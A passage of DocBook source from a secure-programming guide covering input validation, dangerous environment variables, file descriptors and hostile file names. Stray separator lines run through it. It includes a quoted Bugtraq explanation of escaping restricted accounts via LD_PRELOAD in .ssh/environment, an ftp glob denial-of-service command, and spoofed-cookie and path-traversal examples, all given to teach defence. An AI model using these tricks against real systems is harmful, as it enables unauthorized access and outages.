Your delivery mechanism should ideally let users detect unauthorized
|
||
modifications to prevent someone else masquerading as the developer, and
|
||
even better, prevent modification in the first place.
|
||
You should provide documentation on how to securely install, generate,
|
||
and start-up the TOE, possibly generating a log describing how the TOE
|
||
was generated.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Development (ADV).
|
||
These CC requirements deal with documentation describing the TOE
|
||
implementation, and that they need to be consistent between each other
|
||
(e.g., the information in the ST, functional specification, high-level
|
||
design, low-level design, and code, as well as any models of the
|
||
security policy).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Guidance documents (AGD).
|
||
Users and administrators of your product will probably need some
|
||
sort of guidance to help them use it correctly.
|
||
It doesn't need to be on paper; on-line help and "wizards" can help too.
|
||
The guidance should include warnings about actions that may be
|
||
a problem in a secure environemnt, and describe how to use the system
|
||
securely.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Life-cycle support (ALC).
|
||
This includes development security (securing the systems being used
|
||
for development, including physical security),
|
||
a flaw remediation process (to track and correct all security flaws),
|
||
and selecting development tools wisely.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Tests (ATE).
|
||
Simply testing can help, but remember that you need to test the
|
||
security functions and not just general functions.
|
||
You should check if something is set to permit, it's permitted, and
|
||
if it's forbidden, it is no longer permitted.
|
||
Of course, there may be clever ways to subvert this, which is what
|
||
vulnerability assessment is all about (described next).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Vulnerability Assessment (AVA).
|
||
Doing a vulnerability analysis is useful, where
|
||
someone pretends to be an attacker and tries to find vulnerabilities
|
||
in the product using the available information, including documentation
|
||
(look for "don't do X" statements and see if an attacker could exploit them)
|
||
and publicly known past vulnerabilities of this or similar products.
|
||
This book describes various ways of countering known vulnerabilities of
|
||
previous products to problems such as replay attacks (where known-good
|
||
information is stored and retransmitted), buffer overflow attacks,
|
||
race conditions, and other issues that the rest of this book describes.
|
||
The user and administrator guidance documents should be examined to
|
||
ensure that misleading, unreasonable, or conflicting guidance is
|
||
removed, and that secrity procedures for all modes of operation
|
||
have been addressed.
|
||
Specialized systems may need to worry about covert channels;
|
||
read the CC if you wish to learn more about covert channels.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Maintenance of assurance (AMA).
|
||
If you're not going through a CC evaluation, you don't need a formal
|
||
AMA process, but all software undergoes change.
|
||
What is your process to give all your users strong confidence that future
|
||
changes to your software will not create new vulnerabilities?
|
||
For example, you could
|
||
establish a process where multiple people review any proposed changes.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
</sect1>
|
||
</chapter>
|
||
|
||
<chapter id="input">
|
||
<title>Validate All Input</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 2:12 (NIV)</attribution>
|
||
<para>
|
||
Wisdom will save you from the ways of wicked men,
|
||
from men whose words are perverse...
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Some inputs are from untrustable users, so those inputs must be validated
|
||
(filtered) before being used.
|
||
You should determine what is legal and reject anything that does
|
||
not match that definition.
|
||
Do not do the reverse (identify what is illegal and write code to
|
||
reject those cases),
|
||
because you are likely to forget to handle an important case of illegal input.
|
||
</para>
|
||
|
||
<para>
|
||
There is a good reason for identifying ``illegal'' values, though, and that's
|
||
as a set of tests (usually just executed in your head)
|
||
to be sure that your validation code is thorough.
|
||
When I set up an input filter,
|
||
I mentally attack the filter to see if there are
|
||
illegal values that could get through.
|
||
Depending on the input, here are a few examples of common ``illegal'' values
|
||
that your input filters may need to prevent:
|
||
the empty string,
|
||
".", "..", "../", anything starting with "/" or ".",
|
||
anything with "/" or "&" inside it, any control characters (especially NIL
|
||
and newline), and/or
|
||
any characters with the ``high bit'' set (especially
|
||
values decimal 254 and 255, and character 133 is the Unicode Next-of-line
|
||
character used by OS/390).
|
||
Again, your code should not be checking for ``bad'' values; you should do
|
||
this check mentally to be sure that your pattern ruthlessly limits input
|
||
values to legal values.
|
||
If your pattern isn't sufficiently narrow, you need to carefully
|
||
re-examine the pattern to see if there are other problems.
|
||
</para>
|
||
|
||
<para>
|
||
Limit the maximum character length (and minimum length if appropriate),
|
||
and be sure to not lose control when such lengths are exceeded
|
||
(see <xref linkend="buffer-overflow"> for more about buffer overflows).
|
||
</para>
|
||
|
||
<para>
|
||
Here are a few common data types, and things you should validate
|
||
before using them from an untrusted user:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
For strings, identify the legal characters or legal patterns
|
||
(e.g., as a regular expression) and reject anything not matching that form.
|
||
There are special problems when strings contain control characters
|
||
(especially linefeed or NIL) or metacharacters (especially shell
|
||
metacharacters); it is often
|
||
best to ``escape'' such metacharacters immediately when the input is received so
|
||
that such characters are not accidentally sent.
|
||
CERT goes further and recommends escaping all characters
|
||
that aren't in a list of characters not needing escaping [CERT 1998, CMU 1998].
|
||
See <xref linkend="handle-metacharacters">
|
||
for more information on metacharacters.
|
||
Note that
|
||
<ulink url="http://www.w3.org/TR/2001/NOTE-newline-20010314">
|
||
line ending encodings vary on different computers</ulink>:
|
||
Unix-based systems use character 0x0a (linefeed),
|
||
CP/M and DOS based systems (including Windows) use 0x0d 0x0a
|
||
(carriage-return linefeed, and some programs incorrectly reverse the order),
|
||
the Apple MacOS uses 0x0d (carriage return), and IBM OS/390 uses
|
||
0x85 (0x85) (next line, sometimes called newline).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Limit all numbers to the minimum (often zero) and maximum allowed values.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
A full email address checker is actually quite complicated, because there
|
||
are legacy formats that greatly complicate validation if you need
|
||
to support all of them; see mailaddr(7) and IETF RFC 822 [RFC 822]
|
||
for more information if such checking is necessary.
|
||
Friedl [1997] developed a regular expression to check if
|
||
an email address is valid (according to the specification);
|
||
his ``short'' regular expression is 4,724 characters,
|
||
and his ``optimized'' expression (in appendix B) is 6,598 characters long.
|
||
And even that regular expression isn't perfect; it can't recognize local
|
||
email addresses, and it can't handle nested parentheses in comments
|
||
(as the specification permits).
|
||
Often you can simplify and only permit the ``common'' Internet
|
||
address formats.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Filenames should be checked; see
|
||
<xref linkend="file-names"> for more information on filenames.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
URIs (including URLs) should be checked for validity.
|
||
If you are directly acting on a URI (i.e., you're implementing a web
|
||
server or web-server-like program and the URL is a request for your data),
|
||
make sure the URI is valid, and be especially careful of URIs that
|
||
try to ``escape'' the document root (the area of the filesystem
|
||
that the server is responding to).
|
||
The most common ways to escape the document root are via ``..'' or
|
||
a symbolic link, so most servers check any ``..'' directories themselves
|
||
and ignore symbolic links unless specially directed.
|
||
Also remember to decode any encoding first (via URL encoding or
|
||
UTF-8 encoding), or an encoded ``..'' could slip through.
|
||
URIs aren't supposed to even include UTF-8 encoding, so the safest thing
|
||
is to reject any URIs that include characters with high bits set.
|
||
</para>
|
||
<para>
|
||
If you are implementing a system that uses the URI/URL as data,
|
||
you're not home-free at all; you need to ensure that malicious users
|
||
can't insert URIs that will harm other users.
|
||
See <xref linkend="Validating-uris">
|
||
for more information about this.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
When accepting cookie values, make sure to check the domain value
|
||
for any cookie you're using
|
||
is the expected one. Otherwise, a (possibly cracked) related site
|
||
might be able to insert spoofed cookies.
|
||
Here's an example from IETF RFC 2965 of how failing to do this check could
|
||
cause a problem:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
User agent makes request to victim.cracker.edu, gets back
|
||
cookie session_id="1234" and sets the default domain
|
||
victim.cracker.edu.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
User agent makes request to spoof.cracker.edu, gets back cookie
|
||
session-id="1111", with Domain=".cracker.edu".
|
||
</para></listitem>
|
||
<listitem><para>
|
||
User agent makes request to victim.cracker.edu again, and passes:
|
||
<programlisting>
|
||
Cookie: $Version="1"; session_id="1234",
|
||
$Version="1"; session_id="1111"; $Domain=".cracker.edu"
|
||
</programlisting>
|
||
The server at victim.cracker.edu should detect that the second
|
||
cookie was not one it originated by noticing that the Domain
|
||
attribute is not for itself and ignore it.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Unless you account for them,
|
||
the legal character patterns must not include characters
|
||
or character sequences that have special meaning to either
|
||
the program internals or the eventual output:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
A character sequence may have special meaning to the program's internal
|
||
storage format.
|
||
For example, if you store data (internally or externally) in delimited
|
||
strings, make sure that the delimiters are not permitted data values.
|
||
A number of programs
|
||
store data in comma (,) or colon (:) delimited text files;
|
||
inserting the delimiters
|
||
in the input can be a problem unless the program accounts for it (i.e.,
|
||
by preventing it or encoding it in some way).
|
||
Other characters often causing these problems include single and double quotes
|
||
(used for surrounding strings)
|
||
and the less-than sign "<"
|
||
(used in SGML, XML, and HTML to indicate a tag's beginning; this is important
|
||
if you store data in these formats).
|
||
Most data formats have an escape sequence to handle these cases; use it,
|
||
or filter such data on input.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
A character sequence may have special meaning if sent back out to a user.
|
||
A common example of this is permitting HTML tags in data input that will later
|
||
be posted to other readers (e.g., in a guestbook or ``reader comment'' area).
|
||
However, the problem is much more general.
|
||
See <xref linkend="cross-site-malicious-content"> for a general discussion
|
||
on the topic, and see <xref linkend="filter-html"> for a specific discussion
|
||
about filtering HTML.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
These tests should usually be centralized in one place so that the
|
||
validity tests can be easily examined for correctness later.
|
||
</para>
|
||
|
||
<para>
|
||
Make sure that your validity test is actually correct; this is particularly
|
||
a problem when checking input that will be used by another program
|
||
(such as a filename, email address, or URL).
|
||
Often these tests have subtle errors, producing the so-called
|
||
``deputy problem'' (where the checking program
|
||
makes different assumptions than the program that actually uses the data).
|
||
If there's a relevant standard, look at it, but also search to see if
|
||
the program has extensions that you need to know about.
|
||
</para>
|
||
|
||
<para>
|
||
While parsing user input, it's a good idea to temporarily drop all privileges,
|
||
or even create separate processes (with the parser having permanently dropped
|
||
privileges, and the other process performing security checks against the
|
||
parser requests).
|
||
This is especially true if the parsing task is complex (e.g., if you use
|
||
a lex-like or yacc-like tool), or if the programming language
|
||
doesn't protect against buffer overflows (e.g., C and C++).
|
||
See
|
||
<xref linkend="minimize-privileges">
|
||
for more information on minimizing privileges.
|
||
</para>
|
||
|
||
<para>
|
||
When using data for security decisions (e.g., ``let this user in''),
|
||
be sure to use trustworthy channels.
|
||
For example, on a public Internet, don't just use the machine IP address
|
||
or port number as the sole way to authenticate users, because in most
|
||
environments this information can be set
|
||
by the (potentially malicious) user.
|
||
See
|
||
<xref linkend="trustworthy-channels"> for more information.
|
||
</para>
|
||
|
||
<para>
|
||
The following subsections discuss different kinds of inputs to a program;
|
||
note that input includes process state such as environment variables,
|
||
umask values, and so on.
|
||
Not all inputs are under the control of an untrusted user, so you need
|
||
only worry about those inputs that are.
|
||
</para>
|
||
|
||
<sect1 id="command-line">
|
||
<title>Command line</title>
|
||
|
||
<para>
|
||
Many programs take input from the command line.
|
||
A setuid/setgid program's command line data is provided by
|
||
an untrusted user, so a setuid/setgid program must defend itself from
|
||
potentially hostile command line values.
|
||
Attackers can send just about any kind of data through a command line
|
||
(through calls such as the execve(3) call).
|
||
Therefore, setuid/setgid programs must completely
|
||
validate the command line inputs and
|
||
must not trust the name of the program reported by command line argument zero
|
||
(an attacker can set it to any value including NULL).
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="environment-variables">
|
||
<title>Environment Variables</title>
|
||
|
||
<para>
|
||
By default, environment variables are inherited from a process' parent.
|
||
However, when a program executes another program, the calling program
|
||
can set the environment variables to arbitrary values.
|
||
This is dangerous to setuid/setgid programs, because their invoker can
|
||
completely control the environment variables they're given.
|
||
Since they are usually inherited, this also applies transitively; a
|
||
secure program might call some other program and, without special measures,
|
||
would pass potentially dangerous environment variables values on to the
|
||
program it calls.
|
||
The following subsections discuss environment variables and what to
|
||
do with them.
|
||
</para>
|
||
|
||
<sect2 id="env-vars-dangerous">
|
||
<title>Some Environment Variables are Dangerous</title>
|
||
|
||
<para>
|
||
Some environment variables are dangerous because
|
||
many libraries and programs are controlled by environment
|
||
variables in ways that are obscure, subtle, or undocumented.
|
||
For example, the IFS variable is used by the <emphasis remap="it">sh</emphasis> and <emphasis remap="it">bash</emphasis>
|
||
shell to determine which characters separate command line arguments.
|
||
Since the shell is invoked by several low-level calls
|
||
(like system(3) and popen(3) in C, or the back-tick operator in Perl),
|
||
setting IFS to unusual values can subvert apparently-safe calls.
|
||
This behavior is documented in bash and sh, but it's obscure;
|
||
many long-time users only know about IFS because of its use in breaking
|
||
security, not because it's actually used very often for its intended purpose.
|
||
What is worse is that not all environment variables are documented, and
|
||
even if they are, those other programs may change and add dangerous
|
||
environment variables.
|
||
Thus, the only real solution (described below) is to select the ones you
|
||
need and throw away the rest.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="env-storage-dangerous">
|
||
<title>Environment Variable Storage Format is Dangerous</title>
|
||
|
||
<para>
|
||
Normally, programs should use the standard access routines to access
|
||
environment variables.
|
||
For example, in C, you should get values
|
||
using getenv(3), set them using the
|
||
POSIX standard routine putenv(3) or the BSD extension setenv(3)
|
||
and eliminate environment variables using unsetenv(3).
|
||
I should note here that setenv(3) is implemented in Linux, too.
|
||
</para>
|
||
|
||
<para>
|
||
However, crackers need not be so nice; crackers can directly control the
|
||
environment variable data area passed to a program using execve(2).
|
||
This permits some nasty attacks, which can only be understood by
|
||
understanding how environment variables really work.
|
||
In Linux, you can see environ(5) for a summary how about environment variables
|
||
really work.
|
||
In short, environment variables are internally stored as a pointer to
|
||
an array of pointers to characters; this array is stored in order and
|
||
terminated by a NULL pointer (so you'll know when the array ends).
|
||
The pointers to characters, in turn, each
|
||
point to a NIL-terminated string value of the form ``NAME=value''.
|
||
This has several implications, for example, environment variable names
|
||
can't include the equal sign, and neither the name nor value can have
|
||
embedded NIL characters.
|
||
However, a more dangerous implication of this format is that it allows
|
||
multiple entries with the same variable name, but with different values
|
||
(e.g., more than one value for SHELL).
|
||
While typical command shells prohibit doing this,
|
||
a locally-executing cracker can create such a situation using execve(2).
|
||
</para>
|
||
|
||
<para>
|
||
The problem with this storage format (and the way it's set)
|
||
is that a program might check one of these values
|
||
(to see if it's valid) but actually use a different one.
|
||
In Linux,
|
||
the GNU glibc libraries try to shield programs from this;
|
||
glibc 2.1's implementation of getenv will always get the first matching
|
||
entry, setenv and putenv will always set the first matching entry, and
|
||
unsetenv will actually unset <emphasis remap="it">all</emphasis> of the matching entries
|
||
(congratulations to the GNU glibc implementers for implementing
|
||
unsetenv this way!).
|
||
However, some programs go directly to the environ variable and iterate
|
||
across all environment variables; in this case,
|
||
they might use the last matching entry instead of the first one.
|
||
As a result, if checks were made against the first matching entry instead,
|
||
but the actual value used is the last matching entry,
|
||
a cracker can use this fact to circumvent the protection routines.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="env-var-solution">
|
||
<title>The Solution - Extract and Erase</title>
|
||
|
||
<para>
|
||
For secure setuid/setgid programs, the short list of environment variables
|
||
needed as input (if any) should be carefully extracted.
|
||
Then the entire environment should be erased,
|
||
followed by resetting a small set of necessary environment
|
||
variables to safe values.
|
||
There really isn't a better way if you make any calls to subordinate
|
||
programs; there's no practical
|
||
method of listing ``all the dangerous values''.
|
||
Even if you reviewed the source code of every program you call
|
||
directly or indirectly,
|
||
someone may add new undocumented environment variables after you
|
||
write your code, and one of them may be exploitable.
|
||
</para>
|
||
|
||
<para>
|
||
The simple way to erase the environment in C/C++
|
||
is by setting the global variable
|
||
<emphasis remap="it">environ</emphasis>
|
||
to NULL.
|
||
The global variable environ is defined in <unistd.h>; C/C++ users will
|
||
want to #include this header file.
|
||
You will need to manipulate this value before spawning threads, but that's
|
||
rarely a problem, since you want to do these manipulations very early in
|
||
the program's execution (usually before threads are spawned).
|
||
</para>
|
||
|
||
<para>
|
||
The global variable environ's definition is defined in various standards; it's
|
||
not clear that the official standards condone directly changing its value,
|
||
but I'm unaware of any Unix-like system that has trouble
|
||
with doing this.
|
||
I normally just modify the ``environ'' directly;
|
||
manipulating such low-level components is possibly non-portable, but
|
||
it assures you that you get a clean (and safe) environment.
|
||
In the rare case where you need later access to the entire set of
|
||
variables, you could save the ``environ'' variable's value somewhere,
|
||
but this is rarely necessary; nearly all programs need only a few values,
|
||
and the rest can be dropped.
|
||
</para>
|
||
|
||
<para>
|
||
Another way to clear the environment
|
||
is to use the undocumented clearenv() function.
|
||
The function
|
||
clearenv() has an odd history; it was supposed to be defined in POSIX.1, but
|
||
somehow never made it into that standard.
|
||
However, clearenv() is defined in POSIX.9
|
||
(the Fortran 77 bindings to POSIX), so there is a quasi-official status for it.
|
||
In Linux,
|
||
clearenv() is defined in <stdlib.h>, but before using #include
|
||
to include it you must make sure that __USE_MISC is #defined.
|
||
A somewhat more ``official'' approach is to cause __USE_MISC to be defined
|
||
is to first #define either _SVID_SOURCE or _BSD_SOURCE, and then
|
||
#include <features.h> -
|
||
these are the official feature test macros.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
One environment value you'll almost certainly re-add is PATH,
|
||
the list of directories to search for programs; PATH should
|
||
<emphasis remap="it">not</emphasis> include the current directory and usually be something simple like
|
||
``/bin:/usr/bin''.
|
||
Typically you'll also set
|
||
IFS (to its default of `` \t\n'', where space is the first character)
|
||
and TZ (timezone).
|
||
Linux won't die if you don't supply either IFS or TZ,
|
||
but some System V based systems have problems if you don't supply a TZ value,
|
||
and it's rumored that some shells need the IFS value set.
|
||
In Linux, see environ(5) for a list of common environment variables that you
|
||
<emphasis remap="it">might</emphasis> want to set.
|
||
</para>
|
||
|
||
<para>
|
||
If you really need user-supplied values, check the values first
|
||
(to ensure that the values match a pattern for legal values and that they
|
||
are within some reasonable maximum length).
|
||
Ideally there would be some standard trusted file in /etc with the
|
||
information for ``standard safe environment variable values'',
|
||
but at this time there's no standard file defined for this purpose.
|
||
For something similar, you might want to examine the PAM module pam_env
|
||
on those systems which have that module.
|
||
If you allow users to set an arbitrary environment variable, then you'll
|
||
let them subvert restricted shells (more on that below).
|
||
</para>
|
||
|
||
<!-- I haven't seen ANYONE else discuss this in secure programming
|
||
guidelines, probably because shell isn't the best place to start
|
||
anyway, but may as well mention it. -->
|
||
|
||
<para>
|
||
If you're using a shell as your programming language,
|
||
you can use the ``/usr/bin/env'' program with the ``-'' option
|
||
(which erases all environment variables of the program being run).
|
||
Basically, you call /usr/bin/env, give it the ``-'' option,
|
||
follow that with the set of variables and their values you wish to set
|
||
(as name=value),
|
||
and then follow that with the name of the program to run and its arguments.
|
||
You usually want to call the program using the full pathname
|
||
(/usr/bin/env) and not just as ``env'', in case a user has created
|
||
a dangerous PATH value.
|
||
Note that GNU's env also accepts the options
|
||
"-i" and "--ignore-environment" as synonyms (they also erase the
|
||
environment of the program being started), but these aren't portable to
|
||
other versions of env.
|
||
</para>
|
||
|
||
<para>
|
||
If you're programming a setuid/setgid program in a language
|
||
that doesn't allow you to reset the environment directly,
|
||
one approach is to create a ``wrapper'' program.
|
||
The wrapper sets the environment program to safe values, and then
|
||
calls the other program.
|
||
Beware: make sure the wrapper will actually invoke the intended program;
|
||
if it's an interpreted program, make sure there's no race condition possible
|
||
that would allow the interpreter to load a different program than the one
|
||
that was granted the special setuid/setgid privileges.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="env-var-dontset">
|
||
<title>Don't Let Users Set Their Own Environment Variables</title>
|
||
|
||
<para>
|
||
If you allow users to set their own environment variables,
|
||
then users will be able to escape out of restricted accounts
|
||
(these are accounts that are supposed to only let
|
||
the users run certain programs and not work as a general-purpose machine).
|
||
This includes letting users write or modify certain files in their home
|
||
directory (e.g., like .login),
|
||
supporting conventions that load in environment variables from
|
||
files under the user's control (e.g., openssh's .ssh/environment file),
|
||
or supporting protocols that transfer environment variables
|
||
(e.g., the Telnet Environment Option; see CERT Advisory CA-1995-14
|
||
for more).
|
||
Restricted accounts should never be allowed to modify or add any
|
||
file directly contained in their home directory, and instead should be
|
||
given only a specific subdirectory that they are allowed to modify
|
||
(if they can modify any).
|
||
</para>
|
||
|
||
<para>
|
||
ari posted a detailed discussion of this problem on Bugtraq
|
||
on June 24, 2002:
|
||
<blockquote>
|
||
<para>
|
||
Given the similarities with certain other security issues, i'm surprised
|
||
this hasn't been discussed earlier. If it has, people simply haven't
|
||
paid it enough attention.
|
||
</para>
|
||
<para>
|
||
This problem is not necessarily ssh-specific, though most telnet daemons
|
||
that support environment passing should already be configured to remove
|
||
dangerous variables due to a similar (and more serious) issue back in
|
||
'95 (ref: [1]). I will give ssh-based examples here.
|
||
</para>
|
||
<para>
|
||
Scenario one:
|
||
Let's say admin bob has a host that he wants to give people ftp access
|
||
to. Bob doesn't want anyone to have the ability to actually _log into_
|
||
his system, so instead of giving users normal shells, or even no shells,
|
||
bob gives them all (say) /usr/sbin/nologin, a program he wrote himself
|
||
in C to essentially log the attempt to syslog and exit, effectively
|
||
ending the user's session. As far as most people are concerned, the
|
||
user can't do much with this aside from, say, setting up an encrypted
|
||
tunnel.
|
||
</para>
|
||
<para>
|
||
The thing is, bob's system uses dynamic libraries (as most do), and
|
||
/usr/sbin/nologin is dynamically linked (as most such programs are). If
|
||
a user can set his environment variables (e.g. by uploading a
|
||
'.ssh/environment' file) and put some arbitrary file on the system (e.g.
|
||
'doevilstuff.so'), he can bypass any functionality of /usr/sbin/nologin
|
||
completely via LD_PRELOAD (or another member of the LD_* environment
|
||
family).
|
||
</para>
|
||
<para>
|
||
The user can now gain a shell on the system (with his own privileges, of
|
||
course, barring any 'UseLogin' issues (ref: [2])), and administrator
|
||
bob, if he were aware of what just occurred, would be extremely unhappy.
|
||
</para>
|
||
<para>
|
||
Granted, there are all kinds of interesting ways to (more or less) do
|
||
away with this problem. Bob could just grit his teeth and give the ftp
|
||
users a nonexistent shell, or he could statically compile nologin,
|
||
assuming his operating system comes with static libraries. Bob could
|
||
also, humorously, make his nologin program setuid and let the standard C
|
||
library take care of the situation. Then, of course, there are also the
|
||
ssh-specific access controls such as AllowGroup and AllowUsers. These
|
||
may appease the situation in this scenario, but it does not correct the
|
||
problem.
|
||
</para>
|
||
<para>
|
||
... Now, what happens if bob, instead of using /usr/sbin/nologin, wants to
|
||
use (for example) some BBS-type interface that he wrote up or
|
||
downloaded? It can be a script written in perl or tcl or python, or it
|
||
could be a compiled program; doesn't matter. Additionally, bob need not
|
||
be running an ftp server on this host; instead, perhaps bob uses nfs or
|
||
veritas to mount user home directories from a fileserver on his network;
|
||
this exact setup is (unfortunately) employed by many bastion hosts,
|
||
password management hosts and mail servers---to name a few. Perhaps bob
|
||
runs an ISP, and replaces the user's shell when he doesn't pay. With
|
||
all of these possible (and common) scenarios, bob's going to have a
|
||
somewhat more difficult time getting around the problem.
|
||
</para>
|
||
<para>
|
||
... Exploitation of the problem is simple. The circumvention code would be
|
||
compiled into a dynamic library and LD_PRELOAD=/path/to/evil.so should
|
||
be placed into ~user/.ssh/environment (a similar environment option may
|
||
be appended to public keys in the authohrized_keys file). If no
|
||
dynamically loadable programs are executed, this will have no effect.
|
||
</para>
|
||
<para>
|
||
ISPs and universities (along with similarly affected organizations)
|
||
should compile their rejection (or otherwise restricted) binaries
|
||
statically (assuming your operating system comes with static libraries)...
|
||
</para>
|
||
<para>
|
||
Ideally, sshd (and all remote access programs that allow user-definable
|
||
environments) should strip any environment settings that libc ignores
|
||
for setuid programs.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
</sect2>
|
||
</sect1>
|
||
|
||
<sect1 id="file-descriptors">
|
||
<title>File Descriptors</title>
|
||
|
||
<para>
|
||
A program is passed a set of ``open file descriptors'', that is,
|
||
pre-opened files.
|
||
A setuid/setgid program must deal with the fact that the user gets to
|
||
select what files are open and to what (within their permission limits).
|
||
A setuid/setgid program must not assume that opening a new file will always
|
||
open into a fixed file descriptor id, or that the open will succeed at all.
|
||
It must also not assume that standard input (stdin),
|
||
standard output (stdout), and standard error (stderr)
|
||
refer to a terminal or are even open.
|
||
</para>
|
||
|
||
<para>
|
||
The rationale behind this is easy; since an attacker can open or
|
||
close a file descriptor before starting the program,
|
||
the attacker could create an unexpected situation.
|
||
If the attacker closes the standard output, when the program opens
|
||
the next file it will be opened as though it were standard output,
|
||
and then it will send all standard output to that file as well.
|
||
Some C libraries will automatically open stdin, stdout, and stderr
|
||
if they aren't already open (to /dev/null), but this isn't true on
|
||
all Unix-like systems.
|
||
Also, these libraries can't be completely depended on; for example,
|
||
on some systems it's possible to create a race condition
|
||
that causes this automatic opening to fail (and still run the program).
|
||
<!-- OpenBSD, May 2002; see Bugtraq -->
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="file-names">
|
||
<title>File Names</title>
|
||
<para>
|
||
The names of files can, in certain circumstances, cause serious problems.
|
||
This is especially a problem for secure programs that run on computers
|
||
with local untrusted users, but this isn't limited to that circumstance.
|
||
Remote users may be able to trick a program into creating undesirable
|
||
filenames (programs should prevent this, but not all do), or remote
|
||
users may have partially penetrated a system and try using this trick
|
||
to penetrate the rest of the system.
|
||
</para>
|
||
<para>
|
||
Usually you will want to not include ``..''
|
||
(higher directory) as a legal value from an untrusted user, though
|
||
that depends on the circumstances.
|
||
You might also want to list only the characters you will permit, and
|
||
forbidding any filenames that don't match the list.
|
||
It's best to prohibit any change in directory, e.g., by not
|
||
including ``/'' in the set of legal characters, if you're taking data
|
||
from an external user and transforming it into a filename.
|
||
</para>
|
||
|
||
<para>
|
||
Often you shouldn't support ``globbing'', that is,
|
||
expanding filenames using ``*'', ``?'', ``['' (matching ``]''),
|
||
and possibly ``{'' (matching ``}'').
|
||
For example, the command ``ls *.png'' does a glob on ``*.png'' to list
|
||
all PNG files.
|
||
The C fopen(3) command (for example) doesn't do globbing, but the command
|
||
shells perform globbing by default, and in C you can request globbing
|
||
using (for example) glob(3).
|
||
If you don't need globbing, just use the calls that don't do it where
|
||
possible (e.g., fopen(3)) and/or disable them
|
||
(e.g., escape the globbing characters in a shell).
|
||
Be especially careful if you want to permit globbing.
|
||
Globbing can be useful, but complex globs can take a great deal of computing
|
||
time.
|
||
For example, on some ftp servers, performing a few of these requests can
|
||
easily cause a denial-of-service of the entire machine:
|
||
<programlisting>
|
||
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
|
||
</programlisting>
|
||
<!-- http://lwn.net/2001/0322/a/ftpd-dos.php3 -->
|
||
Trying to allow globbing, yet limit globbing patterns, is probably futile.
|
||
Instead, make sure that any such programs run as a separate process and
|
||
use process limits to limit the amount of CPU and other resources
|
||
they can consume.
|
||
See <xref linkend="minimize-resources"> for more information on this
|
||
approach, and see <xref linkend="quotas"> for more information
|
||
on how to set these limits.
|
||
</para>
|
||
|
||
<para>
|
||
Unix-like systems generally forbid including the NIL character in a filename
|
||
(since this marks the end of the name) and the '/' character
|
||
(since this is the directory separator).
|
||
However, they often permit anything else, which is a problem;
|
||
it is easy to write programs that can be subverted by cleverly-created
|
||
filenames.
|
||
</para>
|
||
<para>
|
||
Filenames that can especially cause problems include:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Filenames with leading dashes (-).
|
||
If passed to other programs, this may cause the other programs to
|
||
misinterpret the name as option settings.
|
||
Ideally, Unix-like systems shouldn't allow these filenames;
|
||
they aren't needed and create many unnecessary security problems.
|
||
Unfortunately, currently developers have to deal with them.
|
||
Thus, whenever calling another program with a filename, insert
|
||
``--'' before the filename parameters (to stop option processing, if
|
||
the program supports this common request) or modify the filename
|
||
(e.g., insert ``./'' in front of the filename to keep the dash from
|
||
being the lead character).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Filenames with control characters.
|
||
This especially includes newlines and carriage returns (which are
|
||
often confused as argument separators inside shell scripts, or can
|
||
split log entries into multiple entries) and the
|
||
ESCAPE character (which can interfere with terminal emulators, causing
|
||
them to perform undesired actions outside the user's control).
|
||
Ideally, Unix-like systems shouldn't allow these filenames either;
|
||
they aren't needed and create many unnecessary security problems.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Filenames with spaces; these can sometimes confuse a shell into being
|
||
multiple arguments, with the other arguments causing problems.
|
||
Since other operating systems allow spaces in filenames (including
|
||
Windows and MacOS), for interoperability's sake this will probably
|
||
always be permitted.
|
||
Please be careful in dealing with them, e.g., in the shell use
|
||
double-quotes around all filename parameters whenever calling another
|
||
program.
|
||
You might want to forbid leading and trailing spaces at least; these
|
||
aren't as visible as when they occur in other places, and can confuse
|
||
human users.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Invalid character encoding.
|
||
For example, a program may believe that the filename is UTF-8 encoded,
|
||
but it may have an invalidly long UTF-8 encoding.
|
||
See <xref linkend="character-encoding-utf8"> for more information.
|
||
I'd like to see agreement on the character encoding used for filenames
|
||
(e.g., UTF-8), and then have the operating system enforce the encoding
|
||
(so that only legal encodings are allowed), but that hasn't happened
|
||
at this time.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Another other character special to internal data formats, such as ``<'',
|
||
``;'', quote characters, backslash, and so on.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="file-contents">
|
||
<title>File Contents</title>
|
||
|
||
<para>
|
||
If a program takes directions from a file, it must not trust that file
|
||
specially unless only a trusted user can control its contents.
|
||
Usually this means that an untrusted user must not be able to modify the file,
|
||
its directory, or any of its ancestor directories.
|
||
